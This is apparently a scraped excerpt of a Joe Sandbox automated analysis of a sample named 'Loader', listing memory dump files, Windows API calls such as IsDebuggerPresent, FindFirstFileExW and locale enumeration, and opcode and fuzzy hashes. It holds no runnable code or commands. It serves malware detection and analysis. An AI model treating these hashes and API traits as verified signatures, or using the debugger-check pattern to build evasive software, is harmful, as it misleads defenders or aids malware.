                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction ID: fd8cd92b472d63cb3222eb019da2d4f960f3aaaa87cb0d36c90cea5f3dd368b0
                                                                                                  • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction Fuzzy Hash: 4D023C71E012199BDF14CFA9CD80AAEB7B5FF98314F24C26AD519E7341D731A941CB90
                                                                                                  APIs
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A820D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 46578a468947b71f47189eb081633dd97488fba93f09b4131e9c3606703465c9
                                                                                                  • Instruction ID: 6c5c6b2e54414649ba7908a5b7780143076792ce42a72b28e6608f1eb6dd454f
                                                                                                  • Opcode Fuzzy Hash: 46578a468947b71f47189eb081633dd97488fba93f09b4131e9c3606703465c9
                                                                                                  • Instruction Fuzzy Hash: D271D1B1905168AEDF21FF649D8DBFAB7B9AF05300F1482DAE548A7251EB314E858F10
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A6F8F5
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00A6F9C1
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A6F9DA
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00A6F9E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
                                                                                                  • Instruction ID: 52f410eaa349c78825ceb16ab6e5e30e719a5c3727eb7543ceed0797c9f5862b
                                                                                                  • Opcode Fuzzy Hash: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
                                                                                                  • Instruction Fuzzy Hash: 7D31F7B5D012199BDF21DFA4DD497CDBBB8AF08300F1041EAE40CAB250EB719A858F45
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A815D4
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A8161E
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A816E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 661929714-0
                                                                                                  • Opcode ID: 41ade4927a0e8ec5afbf90713e43f983407b4ce340ad8f6a5361e52d8bb30660
                                                                                                  • Instruction ID: d2825035c6c0ecd0a89f33718dcf555c8d79d12692805b54054ed5dc70c652cb
                                                                                                  • Opcode Fuzzy Hash: 41ade4927a0e8ec5afbf90713e43f983407b4ce340ad8f6a5361e52d8bb30660
                                                                                                  • Instruction Fuzzy Hash: 80619C71A002079FDB28AF28CD82BBA77ACEF04710F1481BAE905D6185FB34D992DF50
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A77F28
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A77F32
                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00A77F3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: 2040d7eb5586652b61b23dc2479bfda5403e63c77a990fbfbf60c363c6b71f42
                                                                                                  • Instruction ID: 9a6a02a11d905d2edae6ae734cc74f8779a0330817be509cd08818892fd5f9b4
                                                                                                  • Opcode Fuzzy Hash: 2040d7eb5586652b61b23dc2479bfda5403e63c77a990fbfbf60c363c6b71f42
                                                                                                  • Instruction Fuzzy Hash: 7A31A27490122DABCB21DF64DD8978DBBB8BF18310F5081EAE41CA7251EB709F858F55
                                                                                                  APIs
                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00A700EC
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,A877E463,00A68E30,?,00A8BE77,000000FF,?,00A6FDB4,?,00000000,00000000,?,00A6FDD8,?,00A68E30,?), ref: 00A700F0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileSystem$Precise
                                                                                                  • String ID:
                                                                                                  • API String ID: 743729956-0
                                                                                                  • Opcode ID: 722e6e83703174ef931c2c05566650e5ae34409dbb14fea3f953b1ad6f5466ff
                                                                                                  • Instruction ID: 4157d752fd3eb1a1e36dcf94fa22bf6917a65d10bb96580ec22c95516a2e9761
                                                                                                  • Opcode Fuzzy Hash: 722e6e83703174ef931c2c05566650e5ae34409dbb14fea3f953b1ad6f5466ff
                                                                                                  • Instruction Fuzzy Hash: 03F03036A44A54EFC701DF98DC44F6ABBA8FB08B60F00852BE81297690DB3569019B90
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A85BB9,?,?,00000008,?,?,00A8BCAB,00000000), ref: 00A85E8B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: 3eb0e36479900f3d6f7a9f5e36aa821c734cc5ffc5c8a3df56caa13d8f1f58e6
                                                                                                  • Instruction ID: c45194b0aa5fb04c7f414f0aa7eddc6c9a25e626732b9c82a36c3682e287a55c
                                                                                                  • Opcode Fuzzy Hash: 3eb0e36479900f3d6f7a9f5e36aa821c734cc5ffc5c8a3df56caa13d8f1f58e6
                                                                                                  • Instruction Fuzzy Hash: DAB14C31A10A089FD715DF28C48AB657BE0FF45364F298698ED99CF2A1C735ED81CB40
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A6F56B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 16acd8c2cccd124bef1a2d158b17534f861af023daf925aec0f6f9c27c642e14
                                                                                                  • Instruction ID: 84badf095453c697ce4f6cfe49946d9d194d095cced1aa1e26efa6fa1eeac607
                                                                                                  • Opcode Fuzzy Hash: 16acd8c2cccd124bef1a2d158b17534f861af023daf925aec0f6f9c27c642e14
                                                                                                  • Instruction Fuzzy Hash: 6EA18BB2A216058FDB18CF98F98569DBBF5FB48324F24C12BD411E7260D7749982CFA0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7D2B4: HeapAlloc.KERNEL32(00000008,?,?,?,00A7C1B7,00000001,00000364,?,00000005,000000FF,?,00A75495,00A98E38,0000000C), ref: 00A7D2F5
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A820D9
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00A821CD
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A8220C
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A8223F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 2701053895-0
                                                                                                  • Opcode ID: 6d8e5291a1677c80c1e5c31f32aaa59c7f36fb50781e3b21b5f656dee4196eb8
                                                                                                  • Instruction ID: 1ad5472dfc660bb1bb68efa39aff40c5912c3b841945180e54bb77a3529c2626
                                                                                                  • Opcode Fuzzy Hash: 6d8e5291a1677c80c1e5c31f32aaa59c7f36fb50781e3b21b5f656dee4196eb8
                                                                                                  • Instruction Fuzzy Hash: 4B5156B1904118AFDF24BF689C85AFEB7BDDF45354F2481AAF50897201EB308D429B60
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A81894
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: baaf47150bbbd5a8a68281479ad14a8f2a0f34468d36f419e55a9e3fb0f99ed3
                                                                                                  • Instruction ID: 4bcd92daeb4e7637cc9ab2ebd1c3638fd36b7bf2b2394ea9b8e084d0ee55b9a3
                                                                                                  • Opcode Fuzzy Hash: baaf47150bbbd5a8a68281479ad14a8f2a0f34468d36f419e55a9e3fb0f99ed3
                                                                                                  • Instruction Fuzzy Hash: F321A472610206ABDB28AF65DD52ABA77ACEF04721F10807EFD06D7141EB34ED42DB50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 0-4108050209
                                                                                                  • Opcode ID: 1e150af34a3af3241bc890eebdd96e948ab1bd4efae72abc7a21114e9a46b410
                                                                                                  • Instruction ID: 7956b5fbe42996c711c533d285beb1335201ed56743e15c31e63f8cc31728d2f
                                                                                                  • Opcode Fuzzy Hash: 1e150af34a3af3241bc890eebdd96e948ab1bd4efae72abc7a21114e9a46b410
                                                                                                  • Instruction Fuzzy Hash: D1B1D030A0060A8BCB24DF68CE55ABFBBB5AF4D300F14C61DE65E97691C7359E42CB91
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • EnumSystemLocalesW.KERNEL32(00A81580,00000001,00000000,?,-00000050,?,00A81363,00000000,-00000002,00000000,?,00000055,?), ref: 00A8154A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 675a8e5ca6f2d719b79afe7d8bbc4db00a5422ec0922b41f8c4f548a5cabad96
                                                                                                  • Instruction ID: 0282186f38beef66134642a5877b65951fc621b90abcc37735ed7e392b1eb8d5
                                                                                                  • Opcode Fuzzy Hash: 675a8e5ca6f2d719b79afe7d8bbc4db00a5422ec0922b41f8c4f548a5cabad96
                                                                                                  • Instruction Fuzzy Hash: 8311C2362007015FDB18AF3998A1ABABB95FF80768B14882DE98787A40E771A943C740
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A819B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 8e48e4aad9a5430698c6f80dca0cfe46fb36330ae905f61bd8c1309b21f425b9
                                                                                                  • Instruction ID: 6479467f0c728e4569c3b32505857107f91c91d4b28b56842dcdf565518f50de
                                                                                                  • Opcode Fuzzy Hash: 8e48e4aad9a5430698c6f80dca0cfe46fb36330ae905f61bd8c1309b21f425b9
                                                                                                  • Instruction Fuzzy Hash: BE11A032610206ABDB14BB68DD569AA77ECEF04720B10817AF506D7141EB74E9069750
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A8179C,00000000,00000000,?), ref: 00A81B39
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 6711266a8b047b2233b2c8c81a48346da1143d59053fb0f683f21452e2823f59
                                                                                                  • Instruction ID: e3a638c7f1e2da61b1106f4969c0b91b0718be6ebcd5f3a7fa63bd16dd569af7
                                                                                                  • Opcode Fuzzy Hash: 6711266a8b047b2233b2c8c81a48346da1143d59053fb0f683f21452e2823f59
                                                                                                  • Instruction Fuzzy Hash: DC01D632710112ABDB286B648C0DABA37ACEF40754F158829ED06E3180FA70EE42C790
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210
                                                                                                  • EnumSystemLocalesW.KERNEL32(00A81840,00000001,?,?,-00000050,?,00A8132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00A8181D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
